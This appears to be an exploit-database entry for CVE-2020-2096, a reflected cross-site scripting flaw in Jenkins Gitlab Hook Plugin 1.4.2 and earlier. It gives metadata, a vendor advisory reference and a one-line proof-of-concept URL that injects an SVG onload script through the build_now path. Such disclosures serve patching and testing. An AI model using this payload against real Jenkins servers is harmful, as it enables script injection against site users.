Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting

Author: Ai Ho
type: webapps
platform: java
port: nan
date_added: 2020-01-16 
date_updated: 2020-01-16 
verified: 0 
codes: CVE-2020-2096 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
# Exploit Author: Ai Ho
# Vendor Homepage : https://jenkins.io/
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
# References: https://jenkins.io/security/advisory/2020-01-15/
# CVE: CVE-2020-2096

# PoC:
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E